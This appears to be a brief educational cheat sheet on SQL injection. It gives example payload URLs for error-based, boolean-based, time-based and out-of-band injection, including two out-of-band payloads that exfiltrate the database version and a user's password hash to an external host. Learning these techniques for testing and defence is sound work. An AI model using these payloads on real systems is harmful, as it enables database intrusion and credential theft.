SQL Injection

SQL injection is a code injection technique that might destroy your database. SQL injection is one of the most common web hacking techniques. SQL injection is the placement of malicious code in SQL statements, via web page input.

Error-Based SQL Injection

When exploiting an error-based SQL Injection vulnerability, attackers can retrieve information such as table names and content from visible database errors.

https://example.com/index.php?id=1+and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

This Request Returned an Error

Duplicate entry 'database1' for key 'group_key'

Boolean-Based SQL Injection

If the page loads as usual, it might indicate that it is vulnerable to an SQL Injection:

https://example.com/index.php?id=1+AND+1=1
https://example.com/index.php?id=1+AND+1=2

Time-Based SQL Injection

https://example.com/index.php?id=1+AND+IF(version()+LIKE+'5%',sleep(3),false)

If the page takes longer than usual to load it is safe to assume that the database version is 5.X.

Out-of-Band SQL Injection Vulnerability

Send Result to example.com:

https://example.com/index.php?id=1+AND+(SELECT+LOAD_FILE(concat('\\\\',(SELECT @@version),'example.com\\')))

https://www.example.com/index.php?query=declare @pass nvarchar(100);SELECT @pass=(SELECT TOP 1 password_hash FROM users);exec('xp_fileexist ''\\' + @pass + '.example.com\c$\boot.ini''')

Consequences

• Add, delete, edit or read content in the database
• Read source code from files on the database server
• Write files to the database server

Resources

• SQLMap
• SQL Injection Payload List
• SQLi Labs

Reference

• W3school: SQL Injection
• SQL Vuln